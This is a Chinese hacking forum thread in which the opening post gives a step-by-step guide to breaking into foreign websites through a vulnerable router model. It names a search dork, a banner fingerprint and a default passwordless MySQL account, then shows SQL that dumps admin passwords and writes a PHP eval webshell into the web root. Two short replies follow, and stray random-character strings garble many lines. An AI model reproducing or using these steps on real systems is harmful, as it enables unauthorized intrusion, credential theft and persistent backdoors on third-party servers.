找回密码
 立即注册
查看: 3155|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
7 A9 h4 b3 @  v8 L' Z. k2 Y2 J! Q% J/ Z" C- h
1:google搜索'Raonet Subscriber Ethernet Router'6 m& j! Q$ l' H

/ J- E! A* p+ ], o; W2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
/ h0 A( X& k) Y2 r
/ M( t, X+ d+ f) j3 Q- V0 k. P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
* U+ J$ P" u: F: w7 H0 j8 `
- L) O2 j- ]% m. r1 ^1 `1 m//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 G# P( k% x- o& p- L0 H% G+ {; o  ^* h- Y

) a/ ]5 _1 Z' w( {& ?) \: I7 W5 I" E" x6 y+ J4 e* G' B' }9 H
入侵步骤:" |% R& l: ~% F8 H

- X+ _8 J; Z: F' [+ T0 _2 C  k1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php  g, @6 P* T, Q/ i4 @
& v6 m+ Z/ f* }6 T$ w
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
% c  j' L& b! ]9 N8 p$ T3:得到密码后连接,查看GUI管理密码:
9 d+ c  D8 V" ~2 z+ R3 G0 `1 Uuse ser_500
0 w6 ~6 L* o' P1 N5 m( z6 Xselect id,passwd from user;' }5 r! b2 T( K+ G  X
4:通过数据库写入webshell,执行命令:
. a* y% |0 h9 H% zuse mysql;+ V3 w; C, d: x, ^* C/ c' @3 p
create table ok(cmd TEXT);& C. y5 j, M0 q( P7 c3 e4 J! d
insert into ok values("<?php @eval($_POST[cmd])?>");
3 P+ P# x$ u! tselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";1 w9 n( l) V/ A5 h% a
drop table ok;
% O+ Y" _; p7 g' M
2 T! ~5 y- Q( T* p5:连接后门shell.php
6 c2 }9 g. L0 X; ?+ U0 G5 A2 I+ ~/ p8 \. l1 u% K
6. 搞定!
* r6 }. i  c0 N5 Y6 e
# j" V4 j$ F* M$ M( `! T5 _
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表